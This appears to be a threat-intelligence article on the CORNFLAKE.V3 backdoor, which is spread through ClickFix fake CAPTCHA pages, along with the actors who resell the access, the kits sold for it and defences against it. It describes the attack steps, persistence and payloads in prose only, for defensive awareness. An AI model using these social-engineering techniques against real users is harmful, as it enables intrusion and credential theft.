CORNFLAKE.V3 Backdoor

Threat actors are increasingly exploiting a deceptive technique known as ClickFix to distribute a sophisticated backdoor, CORNFLAKE.V3. Security researchers tracking the activity, designated UNC5518, have linked it to an access-as-a-service operation where fake CAPTCHA pages trick victims into executing malicious commands. Once access is gained, it is resold or shared with other cybercriminal groups for further exploitation.

How the Attack Begins

The infection chain often starts when users interact with SEO-poisoned search results or malicious ads. Victims are redirected to a fake CAPTCHA verification page, designed to resemble Cloudflare's Turnstile or other legitimate services. Believing they are solving a verification challenge, users are instead guided to copy and paste a malicious PowerShell script into the Windows Run dialog box, giving attackers the foothold they need.

Threat Actor Involvement

The stolen access from UNC5518 campaigns has been leveraged by at least two distinct groups:

• UNC5774 – a financially motivated actor delivering CORNFLAKE to deploy additional payloads.
• UNC4108 – a group with unclear motives, observed using PowerShell to drop malware like VOLTMARKER and NetSupport RAT.

This demonstrates how ClickFix serves as a gateway for a variety of malicious follow-up activities.

Inside CORNFLAKE.V3

The CORNFLAKE.V3 backdoor exists in both JavaScript and PHP variants. It is designed to:

• Execute different payloads via HTTP, including executables, DLLs, JavaScript, batch files, and PowerShell commands.
• Gather basic system data and send it to an attacker-controlled server through Cloudflare tunnels for concealment.

Unlike its predecessor V2, which functioned only as a downloader, V3 introduces persistence by modifying Windows Registry Run keys and supports a broader range of payloads. At least three payloads have been distributed through it, including:

• An Active Directory reconnaissance tool
• A Kerberoasting script for credential theft

WINDYTWIST.SEA, a C-based backdoor with capabilities such as reverse shell access, TCP traffic relaying, and lateral movement

Why ClickFix is Dangerous

The ClickFix method has gained momentum in cybercriminal circles because it relies heavily on human interaction. Users are manipulated into running commands themselves, bypassing many automated security tools. Common delivery vectors include:

• Phishing emails
• Malvertising campaigns
• Drive-by website compromises

To increase credibility, attackers often impersonate well-known brands, Cloudflare checks, or even Discord server verifications.

Commercialization of ClickFix Kits

Since late 2024, ClickFix builders have appeared on underground forums, marketed as 'Win + R' kits. Prices typically range from $200 to $1,500 per month, depending on the features. Individual components, such as source code, landing pages, or command-line scripts, are often sold separately for $200–$500.

Some advanced kits bundle ClickFix builders with other malware loaders and offer:

• Ready-made landing pages with different lures
• Commands guaranteed to bypass antivirus detection
• Options for persistence and SmartScreen evasion

Defensive Measures

To counter ClickFix-based infections, organizations should adopt proactive defenses. Recommended steps include:

• Restricting or disabling the Windows Run dialog where feasible.
• Conducting regular phishing and social engineering simulations to train users.
• Implementing robust logging and monitoring to quickly detect unusual PowerShell or script executions.

By focusing on both prevention and early detection, organizations can significantly reduce the risk posed by campaigns involving ClickFix and CORNFLAKE.V3.